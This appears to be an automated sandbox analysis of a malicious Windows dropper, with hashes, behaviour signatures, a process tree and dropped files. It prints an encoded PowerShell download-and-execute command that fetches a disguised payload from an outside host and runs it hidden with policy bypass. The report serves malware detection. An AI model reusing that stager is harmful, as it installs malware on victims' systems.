Overview

overview

10

Static

static

3

A2AE35821B...51.exe

windows7-x64

10

A2AE35821B...51.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2024 23:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe

  • Size

    17.7MB

  • MD5

    a5b839089ce5953f0ea149c5d9fa2d7a

  • SHA1

    767b6cea8c1c3f892cc2bf20d1a63e52c0376c39

  • SHA256

    a2ae35821b702b7b0fd434a54afa836e69c20904664ce1ed4d3181ba2b8aa051

  • SHA512

    0df01ca9702f52c8f41809a609d409da6f07f257ae05f6b379378213f1ce18ec00406fc8cc798b7cdf75c63ef763b973f57776bd7ed5d7ccf2457d486a1cdb3e

  • SSDEEP

    393216:iaB19LrFHgq7Pck/UibjnYPj77lYaDnHcqEhgAD:TPFHgKUk//rYPpYGHlqgm

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.top4top.io/m_1891i29ay1.mp4

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe
    "C:\Users\Admin\AppData\Local\Temp\A2AE35821B702B7B0FD434A54AFA836E69C20904664CE1ED4D3181BA2B8AA051.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2308
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:444
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXECUTIONPOLICY REMOTESIGNED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,91,83,116,114,105,110,103,93,32,36,80,97,116,104,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,69,110,118,105,114,111,110,40,34,84,69,77,80,34,41,32,43,32,34,92,83,121,115,116,101,109,83,101,99,117,114,105,116,121,51,50,46,80,83,49,34,13,10,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,78,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,32,34,68,111,119,110,108,111,97,100,70,105,108,101,34,44,32,49,44,32,32,64,40,39,104,116,116,112,115,58,47,47,105,46,116,111,112,52,116,111,112,46,105,111,47,109,95,49,56,57,49,105,50,57,97,121,49,46,109,112,52,39,44,32,36,80,97,116,104,41,41,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,48,41,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,80,97,116,104,34)))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2352
    • C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe
      "C:\Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:452

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\$inst\0002.tmp
    Filesize

    1.5MB

    MD5

    63cbbef120a1f96e3586bffb970f44df

    SHA1

    c354224093c565f009f373fceac05ec89f34c902

    SHA256

    e99f7980cdb90e8365bdd66a1f889ed7c4c8858600861006d9b5d139b90ab020

    SHA512

    8b14df69399e00e384103c9b23d2868191b2e8576b0f24e927e334ca97cc31142d62e333d9776e5bae9e851a53dc6bb910090663abb4fae9b37f0e38a545877a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\SystemSecurity32.PS1
    Filesize

    232KB

    MD5

    7e9a5c74501529c97a0675dc7d3e36cc

    SHA1

    c090ead740db008ed6bb1832c31065911103e349

    SHA256

    c4facee5b8bdcb71ad41e600c454bb96a26fb4ab0888285e7182be1ed997b157

    SHA512

    81dfac6d2c9ff07078c4dd356b820c4479683f65f8610be5b010f012183141775d8b5e035f8f34e95cd28f4fd969db5abb3f00d410434d5900c7dba5fcda6716

    Download Submit

  • C:\Users\Admin\AppData\Roaming\IDXDS2021FR.vbs
    Filesize

    153KB

    MD5

    2591c7f4c1ebca785ccb7c074f66782a

    SHA1

    080fa10f63666f48ed0136eb6dfbe5b914292668

    SHA256

    d87330ce060e28593a0a7eb54b4191f83afed4772e63f6330d0be7312c02f5ec

    SHA512

    658e9d852a73bf2a2fa72e1d553958657a0abd32451c45477ba80dd16be4946c1f84c9d40cfb7a955b534f76c7bd0ec106400c53a62fcbb2b3d5401cdc4d44d6

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    9ec4377ce720b399fd340dfaba30e420

    SHA1

    c57ead9cf7b6cd3caa9a903be4cbf2bd18eebdfa

    SHA256

    ec481e5b0ff0675d92918ec274b6aa05885945a906a3e9b25ed16a68fc31bf66

    SHA512

    dc40135e0ad3a018cc8f344ee0c8583ad18d459bacc1cb3483fe229bdd4a526fa9218eba79e30323767d438e1a89fc7bedcaa26346d68da998bc6b5ce8cd32ef

    Download Submit

  • \Program Files (x86)\Advanced System Repair Inc\Advanced System Repair Pro\ASRInstaller.exe
    Filesize

    18.0MB

    MD5

    8bbbcc401fc4d9834fa52d9cc98f9eef

    SHA1

    1aa753b405587c17852bcc447e39c6880498c5c0

    SHA256

    c74c692354f9fc75e9cadf7c9d00756d40b5e6d100bb321260e2c29f7d13abb9

    SHA512

    f3450fec6f4ae1cf3e22db11f5be2aa681a908de4bdfadcbd7fc0a08640e0c2fb9e40d607155f575cb4727b64f6dbb433fedaec67e117636cfaa6d8fcfd48ada

    Download Submit

  • memory/2308-50-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

    Download